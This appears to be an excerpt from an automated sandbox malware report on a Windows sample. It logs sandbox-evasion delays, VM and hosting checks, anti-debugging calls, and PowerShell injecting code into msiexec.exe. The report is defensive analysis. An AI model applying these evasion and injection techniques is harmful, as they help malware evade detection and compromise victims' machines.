              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599563Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599438Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599313Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599203Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599090Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598985Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598763Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598657Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598547Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598438Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598313Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598188Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598063Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595735Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595610Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595485Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595360Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6508Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3148Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7012Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -27670116110564310s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -599891s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2440Thread sleep count: 1620 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2440Thread sleep count: 8214 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -599563s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -599438s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -599313s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -599203s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -599090s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -598985s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -598875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -598763s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -598657s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -598547s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -598438s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -598313s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -598188s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -598063s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -99875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -99766s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -99656s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -99547s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -99438s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -99313s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -99203s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -99094s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -98969s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -98860s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -98735s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -98610s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -98485s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -98360s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -98235s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -98110s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -97953s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -97841s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -595735s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -595610s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -595485s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -595360s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -595235s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -595110s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -594985s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -594860s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -594735s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -594610s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -594485s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -594360s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -594235s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980Thread sleep time: -594110s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeCode function: 0_2_00405FF5 FindFirstFileA,FindClose,0_2_00405FF5
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeCode function: 0_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599563Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599438Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599313Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599203Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599090Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598985Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598763Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598657Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598547Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598438Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598313Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598188Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598063Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99875Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99766Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99656Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99547Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99438Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99313Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99203Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99094Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98969Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98860Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98735Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98610Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98485Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98360Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98235Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98110Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97953Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97841Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595735Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595610Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595485Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595360Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
              Source: msiexec.exe, 00000005.00000002.2614911399.000000000837A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
              Source: msiexec.exe, 00000005.00000002.2614911399.00000000083D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeAPI call chain: ExitProcess graph end nodegraph_0-3403
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02E37EC0 CheckRemoteDebuggerPresent,5_2_02E37EC0
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02C6D6E0 LdrInitializeThunk,2_2_02C6D6E0
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeCode function: 0_2_0040601C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040601C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 40C0000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
